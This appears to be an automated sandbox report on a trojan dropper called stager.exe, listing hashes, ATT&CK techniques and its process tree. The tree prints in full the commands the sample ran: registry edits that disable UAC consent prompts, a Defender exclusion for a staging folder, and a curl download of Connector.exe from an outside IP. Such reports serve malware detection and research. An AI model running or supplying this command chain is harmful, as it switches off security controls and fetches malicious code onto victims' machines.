79d1a9ec049f598528e505aa71fdd68f01f7abcd8cb29c1e54ba018d239ae282

General

Target

stager.exe
Size

1.9MB
MD5

4ed2a8948a165b72025d5868a31a34c8
SHA1

b25b9db66eefe9418bb398a8a5ffe4aebb7d4ff8
SHA256

79d1a9ec049f598528e505aa71fdd68f01f7abcd8cb29c1e54ba018d239ae282
SHA512

64411bb2f3510f26114d809409dd9af29238fb1c43ee005c08c3b00826be0bce0230ad26afc786961b659d8cc470f59ed12108b4a11056b702a516330bbec380
SSDEEP

24576:GXjaqCL0DG3EZJOHVXGGUIHjNGxmKg7xf:GXjaADG3EWVd

Score

10^/10

evasion trojan

Malware Config

Signatures

UAC bypass 3 TTPs 2 IoCs

evasion trojan

Bypass User Account Control

T1088

Disabling Security Tools

T1089

Modify Registry

T1112

description	ioc	Process
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorAdmin = "0"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorUser = "0"	reg.exe

Drops startup file 1 IoCs

description	ioc	Process
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Connector.lnk	stager.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Suspicious behavior: EnumeratesProcesses 1 IoCs

pid	Process
2196	powershell.exe

Suspicious use of AdjustPrivilegeToken 1 IoCs

description	pid	Process
Token: SeDebugPrivilege	2196	powershell.exe

Suspicious use of WriteProcessMemory 24 IoCs

description	pid	Process	procid_target
PID 2572 wrote to memory of 2628	2572	stager.exe	29
PID 2572 wrote to memory of 2628	2572	stager.exe	29
PID 2572 wrote to memory of 2628	2572	stager.exe	29
PID 2628 wrote to memory of 2560	2628	cmd.exe	30
PID 2628 wrote to memory of 2560	2628	cmd.exe	30
PID 2628 wrote to memory of 2560	2628	cmd.exe	30
PID 2572 wrote to memory of 2556	2572	stager.exe	31
PID 2572 wrote to memory of 2556	2572	stager.exe	31
PID 2572 wrote to memory of 2556	2572	stager.exe	31
PID 2556 wrote to memory of 1640	2556	cmd.exe	32
PID 2556 wrote to memory of 1640	2556	cmd.exe	32
PID 2556 wrote to memory of 1640	2556	cmd.exe	32
PID 2572 wrote to memory of 2680	2572	stager.exe	33
PID 2572 wrote to memory of 2680	2572	stager.exe	33
PID 2572 wrote to memory of 2680	2572	stager.exe	33
PID 2572 wrote to memory of 1284	2572	stager.exe	34
PID 2572 wrote to memory of 1284	2572	stager.exe	34
PID 2572 wrote to memory of 1284	2572	stager.exe	34
PID 1284 wrote to memory of 2196	1284	cmd.exe	35
PID 1284 wrote to memory of 2196	1284	cmd.exe	35
PID 1284 wrote to memory of 2196	1284	cmd.exe	35
PID 2572 wrote to memory of 2924	2572	stager.exe	36
PID 2572 wrote to memory of 2924	2572	stager.exe	36
PID 2572 wrote to memory of 2924	2572	stager.exe	36

C:\Users\Admin\AppData\Local\Temp\stager.exe
"C:\Users\Admin\AppData\Local\Temp\stager.exe"
1⤵
- Drops startup file
- Suspicious use of WriteProcessMemory
PID:2572
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c reg add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v ConsentPromptBehaviorAdmin /t REG_DWORD /d 0 /f
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:2628
- - C:\Windows\system32\reg.exe
    reg add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v ConsentPromptBehaviorAdmin /t REG_DWORD /d 0 /f
    3⤵
    - UAC bypass
    PID:2560
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c reg add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v ConsentPromptBehaviorUser /t REG_DWORD /d 0 /f
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:2556
- - C:\Windows\system32\reg.exe
    reg add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v ConsentPromptBehaviorUser /t REG_DWORD /d 0 /f
    3⤵
    - UAC bypass
    PID:1640
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c mkdir "C:\MicS"
  2⤵
  PID:2680
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c powershell -Command Add-MpPreference -ExclusionPath "C:\MicS"
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:1284
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell -Command Add-MpPreference -ExclusionPath "C:\MicS"
    3⤵
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:2196
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c curl -o "C:\MicS\Connector.exe" "http://13.50.250.113/Connector.exe"
  2⤵
  PID:2924

Network

MITRE ATT&CK Enterprise v6

Initial Access

Execution

Persistence

Privilege Escalation

Bypass User Account Control

1

T1088

Defense Evasion

Bypass User Account Control

1

T1088

Disabling Security Tools

Modify Registry

Credential Access

Discovery

System Information Discovery

1

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

memory/2196-59-0x000000001B1D0000-0x000000001B4B2000-memory.dmp

Filesize
2.9MB

Download
memory/2196-60-0x000007FEF5750000-0x000007FEF60ED000-memory.dmp

Filesize
9.6MB

Download
memory/2196-62-0x0000000002830000-0x00000000028B0000-memory.dmp

Filesize
512KB

Download
memory/2196-61-0x0000000002320000-0x0000000002328000-memory.dmp

Filesize
32KB

Download
memory/2196-63-0x0000000002830000-0x00000000028B0000-memory.dmp

Filesize
512KB

Download
memory/2196-64-0x000007FEF5750000-0x000007FEF60ED000-memory.dmp

Filesize
9.6MB

Download
memory/2196-65-0x0000000002830000-0x00000000028B0000-memory.dmp

Filesize
512KB

Download
memory/2196-66-0x0000000002830000-0x00000000028B0000-memory.dmp

Filesize
512KB

Download
memory/2196-67-0x000007FEF5750000-0x000007FEF60ED000-memory.dmp

Filesize
9.6MB

Download
memory/2572-54-0x000000013FE90000-0x0000000140121000-memory.dmp

Filesize
2.6MB

Download
memory/2572-69-0x000000013FE90000-0x0000000140121000-memory.dmp

Filesize
2.6MB

Download

Analysis

Sharing

General

Malware Config

Signatures

Processes

Network

MITRE ATT&CK Enterprise v6

Replay Monitor

Loading Replay Monitor...

Downloads